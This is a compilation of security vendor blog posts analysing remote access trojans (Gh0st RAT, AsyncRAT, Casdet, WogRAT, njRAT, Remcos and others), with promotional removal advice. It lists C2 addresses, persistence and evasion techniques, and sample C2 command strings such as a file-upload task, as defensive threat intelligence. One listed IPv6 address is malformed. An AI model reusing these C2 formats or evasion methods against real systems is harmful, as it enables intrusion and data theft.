Gh0st RAT Trojan Targets Chinese Windows Users

In early June, cybersecurity researchers discovered a malicious campaign targeting users from China. Threat actors are spreading Gh0st RAT using the malware dropper Gh0stGambit, which finds its way to user devices through a phishing site chrome-web[.]com. The attackers employed a drive-by download. They offered users a Google Chrome installer file on a page that appeared to be a legitimate Chrome downloading site. However, the MSI installer downloaded from the fake site contains two files: the legitimate Chrome installation executable and the malicious installer WindowsProgram.msi, which is used to execute shell code responsible for downloading Gh0stGambit.

Gh0st RAT is a long-standing piece of malware from the arsenal of APT27, with its source code made publicly available in 2008. According to sources, its command infrastructure was primarily based in the People’s Republic of China. Written in C++, it has appeared in various forms over the years, primarily in campaigns organized by China-linked cyber espionage groups. Researchers report that a modified variant of Gh0st RAT was used in campaigns by the hacker group in 2018.

Some Details

The exact attack happens in a multi-staged manner. Before carrying out its primary task, Gh0stGambit checks the system for anti-malware software, such as Microsoft Defender or 360 SafeGuard. If it detects these programs, it adds its folder to their exclusions. Then it connects to a command and control server at hxxp://pplilv.bond/d4/107.148.73[.]225/reg32 and initiates the download of Gh0st RAT.

Gh0st RAT is delivered in encrypted form disguised as a Registry Workshop. In addition to providing remote access, it can collect information (keylogging, screen capturing, etc.). Moreover, it contains an embedded rootkit that allows it to hide certain system elements, such as the registry or directories.

It can also can drop Mimikatz in the system folder, enable RDP on compromised hosts, gain access to account identifiers associated with Tencent QQ, clear Windows event logs, and erase data from 360 Secure Browser, QQ Browser, and Sogou Explorer.

It is rather unusual to see malware with allegedly Chinese origin to attack users from mainland China. Typically threat actors keep away from attacking anything or anyone within their country, as it makes the distance to law enforcement too short. Thing is – it is not just regular malware, but a toolkit for spying on citizens. And earlier, APT27 was seen doing exactly this to Chinese citizens, both on the mainland and on Taiwan.

How to protect your system?

Such staged, multi-component attacks require advanced security software to protect against. Aside from excellent real-time and database-backed protection, it should also feature a network protection system that may filter out phishing sites like the one used in this campaign. All this is available in GridinSoft Anti-Malware – check it out through the banner below.

The post Gh0st RAT Malware Attacks Chinese Users Via Fake Chrome Page appeared first on Gridinsoft Blog.

AsyncRAT Spreads in Fake eBook Files

The latest spreading campaign of AsyncRAT was described in detail by ASEC analysts. Fraudulent actors publish what originally looks like a downloading link for an archive that contains the desired book. As I’ve mentioned, the specific book that this website offers is not free, so it adds even more to the temptation of a user. After hitting the download button, they see a genuinely looking file, and click it, hoping to open the book.

But despite the expectation, nothing will ever happen. This file is only made to look like one of an ebook, and is in fact a disguised compressed file that triggers the chain of malicious events. Shall the user click on it, the file executes its script, launching a multi-stage malware loader. All the resources needed for the attack (except the final payload) are stored in this exact fake ebook file.

The first thing that is launched is a PowerShell script that initially checks the system for antivirus software. Then, it starts playing with the files in the archive, which only look as video files. In fact, they only have extensions of ones, being a VBS script under the bonnet. This first batch file collects system information and runs another VBS file that eventually downloads AsyncRAT from the command server. The other script creates another task in the Scheduler, and executes the final payload.

What is AsyncRAT?

AsyncRAT is an open-source remote access tool, that originally appeared on public in 2019. For obvious reasons, it is often weaponized by malicious actors. Even in its original design, it is a powerful toolkit for remote access and administration, with the application of encrypted connections during the session. AsyncRAT is capable of logging keystrokes, sending remote commands, controlling the attacked system and deploying malware.

As the source code is freely available, it is nearly impossible to trace a specific cybercrime gang that uses it in their attacks. In fact, AsyncRAT appears in both attacks on individuals and high-profile cyberattacks led by state sponsored actors. Open-source nature also adds to the flexibility of the payload. Functionality, detection evasion, capabilities for other malware delivery – they can alter pretty much anything. This is what makes not only AsyncRAT, but any open-source malware exceptionally dangerous.

How to protect against malware?

To stop the obfuscated malware spreading campaign like the one I’ve described above, I recommend using GridinSoft Anti-Malware. Its multi-component detection system will stop the attack even before the malicious file gets to the system, thanks to its superior online protection module.

The post AsyncRAT Spreads As Fake eBook Files, Uses LNK Files appeared first on Gridinsoft Blog.

Casdet is a severe threat mainly used for reconnaissance and delivering other payloads to the device. It also collects some data about the system but can be modified for different tasks, such as direct information theft.

Trojan:Win32/Casdet!rfn Overview

Trojan:Win32/Casdet!rfn is a detection that Microsoft Defender mainly uses for remote access trojans (RATs). Such malware, as its name implies, provides remote access and is often used for reconnaissance and delivery of other malware. Casdet doesn’t usually collect a lot of information, but the payload it carries is what does the most damage. Aside from this, Casdet has a modular structure, which allows it to dynamically plug in modules it needs and act as an information stealer, for example.

Trojan:Win32/Casdet!rfn is usually spread via phishing emails and cracked software, spread through p2p networks. Rarely though it can turn out as a false positive, marking a legitimate file as malicious. Some users have complained about Trojan:Win32/Casdet!rfn detection after downloading and installing a legitimate Android emulator, e-books, or game mods. Let’s take a detailed look at how this malware works.

Detailed Analysis

First, let’s remember how a Remote Access Trojan (RAT) works. In general, RATs collect sensitive data and can be used for various purposes, including espionage and remote control of compromised devices. However, Casdet!rfn overall and the sample I was reviewing mostly works as a malware downloader. Let’s break down its actions step-by-step.

Initial Access

The sample of Casdet Trojan picked for this test was reaching the victim’s device through phishing emails. In some rare cases, hackers were picking a victim and targeting the emails on this specific person. Threat, or its loader usually hides within the attached file. Message body at the same time motivates the victim to run the attachment, lulling the vigilance.

Execution, Detection Evasion & Fingerprinting

Trojan:Win32/Casdet!rfn employs various techniques to evade detection by security systems. These techniques include obfuscation and checks for virtual machines or debuggers. The latter is done by listing the processes and checking registry keys that can contain information about the environment. Detection evasion, on the other hand, mostly relies on packing and obfuscation; the only trick the malware pulls during the execution is idling for several minutes at the start.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache

Additionally, it performs so-called geofencing through checking the language packs installed in the system. That’s a rather common tactic for different malware families, as the developers try to avoid attacking anything from their own country. Below, you can see the specific registry keys it scans for this.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
HKCU\Software\Classes\Local Settings\MuiCache\130\52C64B7E\LanguageList

When malware infiltrates a system, it aims to establish persistence to ensure its continued operation and control. It abuses WerFault through the command I’ve pasted below to gain persistence and additional execution privileges. This allows it to maintain a foothold in the system even after reboots or security scans.

C:\Windows\system32\WerFault.exe -u -p 3560 -s 216

After these operations, Casdet collects basic information about the system. This system’s fingerprint serves to identify it and is unique to each system. While this information doesn’t contain valuable or sensitive data, it is a system fingerprint that is sent to the C2.

C2 Communications

The way Casdet malware communicates with the command server is nothing special. It carries a selection of IP addresses in its binary file, and decodes it when the time has come. Then, it forms the HTTP POST request, encrypts it, and sends it to the command server.

C2 in response will send a tiny blob of information that contains further instructions> for the malware. Among them are uploading a specific file from the infected machine, executing the command, or connecting to the remote server to pull the payload and run it. All the supplementary info comes in the same response package.

Payload

Regarding payloads, this is where Trojan:Win32/Casdet!rfn shines: it can deploy literally any malware type. But most of the time, Casdet delivers ransomware, spyware, droppers and similar things. It runs the DllMain function from a DLL file in the user’s temporary folder using the rundll32.exe utility. The DllMain function is called when the DLL is loaded during system events like DLL_PROCESS_ATTACH and DLL_PROCESS_DETACH.

"C:\Windows\System32\rundll32.exe"
C:\Users\A4148~1.MON\AppData\Local\Temp\e8442b7f12ab7cb616c549181d39c10b.dll,DllMain

At the same time, Casdet has a modular structure, which allows it to act standalone when needed. This malware in particular was capable of getting infostealer functionality or extending its dropper functions. On top of what it is capable of by default, it makes a single sample of Casdet capable of performing a full-fledged cyberattack.

How To Remove Trojan:Win32/Casdet!rfn?

To remove Trojan:Win32/Casdet!rfn, I recommend using GridinSoft Anti-Malware. This program is resilient to the anti-detection techniques this malware uses, thanks to its multi-component detection system.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Casdet!rfn appeared first on Gridinsoft Blog.

Viruses like Grenam can be disguised as legitimate software. The specific capabilities and behaviors of the malware may differ depending on the variant. However, it is commonly associated with the delivery of other malicious software, making it a severe threat to the security and privacy of computer systems.

Virus:Win32/Grenam.VA!MSR Overview

Virus:Win32/Grenam.VA!MSR is a generic detection name used by Microsoft Defender Antivirus to identify a type of malware that belongs to the Grenam family. This family consists of backdoors and Remote Access Trojans (RATs). These types of malware are designed to provide unauthorized remote access to a target system. It is used to steal sensitive data, install malicious software, or cause other damage.

Grenam malware can infiltrate a system through various methods, but the most common ones include malicious advertising and pirated software. Once the malware is installed, it uses anti-analysis and defense software evasion features to avoid detection by antivirus programs. As a result, it can remain undetected on a system for long periods, giving access to more dangerous malware.

Technical Analysis

Let’s look at one of the Virus:Win32/Grenam.VA!MSR samples to understand how it works. Once the malware enters the system, it executes initial dropper files such as C:\DllLoader.exe and C:\Documents and Settings\\Application Data\Ground.exe. Next, the malware executes using scripts or command-line arguments, such as Windows Script Host or PowerShell, to initiate scripts. It also drops and executes binary files with absolutely meaningless names, like b013bf6f928a3bf40678e87d9da48f161e2e30908f98c78dfa9f2bd8cf3814d2.exe.

Moreover, some users report that their desktop wallpaper was changed after detecting this malware.

Establishing Persistence

To ensure continuity and maintain a persistent presence on the infected machine, it requesting the following permissions by calling for a WinAPI function:

SE_LOAD_DRIVER_PRIVILEGE

The malware may exploit system vulnerabilities or use stolen credentials to gain higher privileges necessary for deeper system access and modification. The malware often manipulates other system settings or uses exploits to elevate privileges.

After finishing with persistence, Grenam starts rummaging through registry keys to collect info about the system. It mainly concentrates on data like CPU, display resolution, installed programs, etc, without getting into user data.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Defense Evasion

To evade detection from antivirus software and system monitoring tools, the malware employs techniques such as obfuscating its files and operations, hiding windows, and masquerading its processes. It also uses XOR and RC4 to encode data, modify file attributes, and renames its files with misleading extensions.

These keys store advanced Windows Explorer settings like hidden files, file extensions, and title bar paths, system-wide policies affecting user accounts, rights, security options, and system behaviors, information on system services, and Shell Execute Hooks that modify Windows Shell behavior.

Command and Control

Finally, once it has the required access and control, the malware can execute actions as directed by its operators, including data exfiltration, further infections, or using the host for additional attacks. The malware opens backdoors and communicates with external servers via TCP and UDP to known bad IPs to establish control.

TCP 23.216.147.62:443
TCP 23.216.147.64:443
UDP a83f:8110:4170:706c:6963:6174:696f:6e50:53

This is a clear indicator of C2 activity. The malware infects other executable files or uses network connections to spread to additional systems within the network environment. It infects files and possibly uses network drives to spread itself.

How To Remove Virus:Win32/Grenam.VA!MSR?

If you are struggling with Virus:Win32/Grenam.VA!MSR, I suggest using GridinSoft Anti-Malware. This software has advanced features that can effectively find and neutralize malware from your system. In addition to removing existing threats, this solution provides long-term protection to prevent unwanted effects from other malware.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Virus:Win32/Grenam.VA!MSR appeared first on Gridinsoft Blog.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs with a legitimate program, i.e., inside of hacked games from torrents or within an email attachment. Once an attacker compromises the host system, it can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, RAT can be deployed as a payload using exploit kits. Once successfully deployed, RAT directly connects to the command-and-control (C&C) server the attackers control. They achieve this by using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

• Use spyware and keyloggers to track the victim’s behavior
• Gain access to sensitive data, including social security numbers and credit card information
• View and record video from a webcam and microphone
• Take screenshots
• Format disks
• Download, change or delete files
• Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. RAT is similar to Remote Desktop Protocol (RDP) or Anydesk but differs in its stealth. RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to RAT, and it can return the data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker may gain a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. As a result, they gained remote access to a computer authenticated in the SCADA (supervisory control and data collection) machines that controlled the country’s utility infrastructure. In addition, Remote Access Trojan allowed attackers to access sensitive resources by bypassing the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to the threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

• Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
• Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
• Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.

Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.

• Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

NjRAT is probably the most known and the oldest among remote-access trojans. Appeared in 2012, it keeps getting updates, which adjust its functionality to the modern “standards”, which makes up for its longevity. The reason for this is probably the attention from state-sponsored threat actors – APT36 and APT41 – who use it in cyberattacks almost since its very inception.

Key functionality of njRAT is typical for pretty much any remote-access trojan – it is about providing remote access. The latter is topped up with uploading and downloading files by command, log keystrokes and capture microphone and camera inputs. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses a Mimikatz password stealer to authenticate using a hash transfer method that reuses operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting production control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly and Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, developers released two significant versions of RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable task manager, firewall, or user access control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the author of the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user has such permissions. Since VNC is a legitimate tool, Haseber antivirus tools do not identify it as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, it’s strategy for defending against RATs depends on organization-wide security training. In addition, victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant not to contaminate the company network and jeopardize the entire organization accidentally.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

• More strict firewall settings
• Safelisting IP addresses for authorized users
• Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, Remote Access Trojan is a threat only if installed and implemented on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of RAT. Overall, these actions are a good tone for improving security for any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but contain malicious features associated with the actual application. Tracking the application and system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

The post Remote Access Trojan (RAT) appeared first on Gridinsoft Blog.

What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic example of a remote access trojan, a backdoor-like malicious program that focuses on providing remote access to the infected system. ASEC researchers were first to detect and track the malware campaign. They additionally emphasize that this malicious program primarily targets Asian countries – China, Japan, Singapore and Hong Kong in the first place.

The strange thing about WogRAT is that its spreading campaigns were not detected, even though some of the methods were explained in the original research. Malware (more specifically – its loader) is disguised as a file posted on an online notepad service. Its naming supposes that frauds offer WogRAT as a system/program tweaking utility of some sort. This, in turn, supposes that initial spreading of the malware happens in “closed” places, like chats in messengers or the like.

Names for malware loader files that are available from aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As I said, the original downloading from the aNotepad site gets only the malware loader in the encoded form. Upon execution, it compiles itself on the run and requests the actual payload from a different page hosted on the same site. Depending on the attack, the source for the second-stage payload may differ.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP – the command used by the loader to compile itself

The downloaded file is a similar .NET assembly, encoded with Base64 and present as a text string on the source website. Loader decrypts the payload and loads it into the memory using process hollowing technique.

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068

Upon startup, WogRAT collects basic system information by checking different registry keys and executing commands. In particular, it gathers info about network connections, system version, username and some of the info regarding system policies. Malware stacks this data with the info of its own process and sends it to the command server in the HTTP POST request. After that, malware switches to idle, waiting for the commands.

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT has a rather interesting set of commands and properties that it is expecting to receive. The simplified formula consists of 3 elements, and looks like this:

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

This malware supports 5 different types of operations: running specific files, downloading or uploading the files, altering the idle time, and terminating the execution. Not a huge list at the first glance, but in combination with different task types this gives a full-fledged backdoor functionality.

How to remove WogRAT?

WogRAT is not the stealthiest malware out there; it is in fact more reliant on the tricky spreading method and double-staged loader. Still, the amount of hooks it creates in the system makes it particularly hard to remove manually. For that reason, I recommend using GridinSoft Anti-Malware: a full scan with that program will be enough to repel the RAT and all of its parts across the system.

The post WingsOfGod.dll – WogRAT Malware Analysis & Removal appeared first on Gridinsoft Blog.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Windows Defender detection for njRAT malware, that is categorized as backdoor. “Bladabindi” is one of many names used by antivirus companies to categorize and identify various malware, including njRAT.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection upon launch. It comes with its own builder, and before attacking, it allows hackers to pre-configure the payload to their needs before it is delivered to the victim’s computer. This includes the name of the executable file, startup key creation in the registry, directory placement within the target system, host IP address, and network port, among others.

Such customization enables njRAT to circumvent many static checks called to avoid antivirus detection. Additionally, the malware utilizes multiple .NET obfuscators, making its code challenging to analyze for both humans and automated systems. These features make njRAT a tough nut to both analyze and detect and obviously stand for its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures its persistence within the infected system by creating a startup instance, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also manipulates the Windows registry by creating a key with a unique name and a random set of characters and digits under the “HKEY_CURRENT_USER\Software\32” hive. These actions ensure that the malware executes each time the system boots up. They maintain a foothold within the infected machine even after reboots.

Data Collection & Other Functionality

After finalizing the preparations, njRAT a.k.a Bladabindi performs some basic callouts to the command server. Depending on the response, malware can switch to the idle, start collecting user data or pull the additional payload from the remote server. The overall list of actions it can perform is the following:

• Executing remote shell commands
• Downloading and uploading files
• Capturing screenshots
• Logging keystrokes
• Camera and microphone access
• Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some programs may have features or behaviors that may be mistakenly considered suspicious by antivirus software. As a result, Windows Defender shows a false positive detection. This may be due to the use of certain APIs, network requests, or data encryption that may be characteristic of malware but are also present in legitimate applications.

It’s also worth noting that antivirus often adds “!ml” to the end of its name – to indicate the use of the AI detection system. Although it is a highly effective method, without the confirmation from other detection systems, it is easy to make it generate false positive detections.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a reliable antivirus program with updated virus databases. I recommend an antivirus like GridinSoft Anti-Malware, it is best to detect and remove even the sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

The post Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

Remcos RAT Uses Webhards to Spread

Recent research of South Korean cybersecurity firm AhnLab shares its observations regarding a new Remcos RAT spreading campaign. The company names Webhards as a source of choice for this malware to infiltrate user devices. Webhards is a file sharing platform, popular among computer pirates and people who seek free content. It may be used for legitimate purposes, though a selection of analysts name it a popular source of malware, along with torrents.

In the case of Remcos RAT, hackers use “hot topics” – either adult content or cracked versions of new games to make the user download the infected package. Then, the publication on the aforementioned site asks to run a Game.exe file, that is present in the downloaded archive. Upon running the executable file, a chain of VBS scripts are executed to download the final payload.

Upon downloading, another set of scripts injects Remcos into a system process called ServiceModelReg.exe. This is a built-in console utility that is, in fact, used only during the system installation and has no further application. Well, until this instance of Remcos finds its way to the machine, apparently.

What is Remcos RAT?

Remcos is a remote access trojan, marketed as a legit remote access tool by German firm BreakingSecurity. Released in 2019, it has become particularly popular in 2020 and 2021, when threat actors were using Covid-themed emails to spread it. Later though, its activity has become much more moderate, averaging at 30 samples per day during 2023.

For functionality, this malware is a classic example of RAT: Remcos provides full-featured remote access to the infected system, including access to system menus and file system. Additionally, it is capable of recording the screen, taking screenshots and setting the activity alarm. To identify target systems from each other, malware collects some basic information – OS version, date, time, and some basic hardware info.

How to protect against threats?

By looking at the ways the malware spreads you can already get the answer on how to protect yourself. In the case of Remcos, the obvious answer is to avoid cracked software. As it is not just a malware risk but also a copyright infringement, avoiding it is pretty much recommended. This is especially relevant for websites that are known for being used for malware distribution.

For an additional, passive layer of protection, you can have anti-malware software running in the background. A modern, well-stocked antivirus can protect you from any attack, regardless of the type of malware. GridinSoft Anti-Malware is the one you can rely on – its detection system offers exceptional protection in both proactive and reactive approaches.

The post Remcos RAT Targets South Korean Users Through Webhards appeared first on Gridinsoft Blog.

SugarGh0st Uses Spear Phishing to Attack Governments

Researchers have uncovered a new wave of cyber threats targeting government entities in Uzbekistan and South Korea in recent cybersecurity developments. Utilizing a customized variant of the infamous Gh0st RAT, dubbed SugarGh0st, the campaign displays a sophisticated and multi-stage infection chain.

Targets were focused on foreign ministry personnel based on lures about investment projects, account credentials, and internal memos. These topics were selected as likely to entice victims to enable the malware unknowingly while viewing what seemed like legitimate work documents. Overall, the pick of targets point at the relationship of SugarGh0st’s masters to Chinese government.

Multi-stage infection chain

Once delivered through emails, the malicious documents trigger a multi-stage process to install SugarGh0st on systems.It is performed using JavaScript and shortcut files execute commands to drop the RAT executable, decrypt it, and activate full functionality in the background. Techniques like LotL binaries, side-loading DLLs, and abusing legitimate Windows utilities help mask the deployment from defenses and user detection. Aimed at foreign ministry networks, the operational security exhibits an adversary carefully honing its tradecraft before targeting sensitive agencies.

Following the installation, SugarGh0st offers advanced monitoring, exfiltration, and manipulation capabilities. This surpasses typical malware in commodity cybercrime operations. Functions allow recording keystrokes, activating webcams, executing files, or killing processes – all directed dynamically by attacker commands. Such comprehensive access risks the integrity of infected government agencies through unconstrained internal spying.

Depending on operational security practices, lateral movement could also jeopardize more comprehensive departments and ministry networks. While assessing the total damage remains challenging, the implications are clearly severe. Moreover, this has allowed stolen secrets to impact international affairs or relations.

A Gh0st RAT Variant and Potential Chinese Connection

While the attribution remains speculative, artifacts in the decoy documents hint at a potential Chinese-speaking actor. Two files within the campaign contain Chinese characters in their “last modified by” names, suggesting a linguistic connection to China. As the name suggests, SugarGh0st represents an evolution of existing Chinese-linked Gh0st RAT variants in circulation for over 15 years. Developed by the Chinese group 红狼小组 (C.Rufus Security Team), Gh0st RAT has been active since 2008.

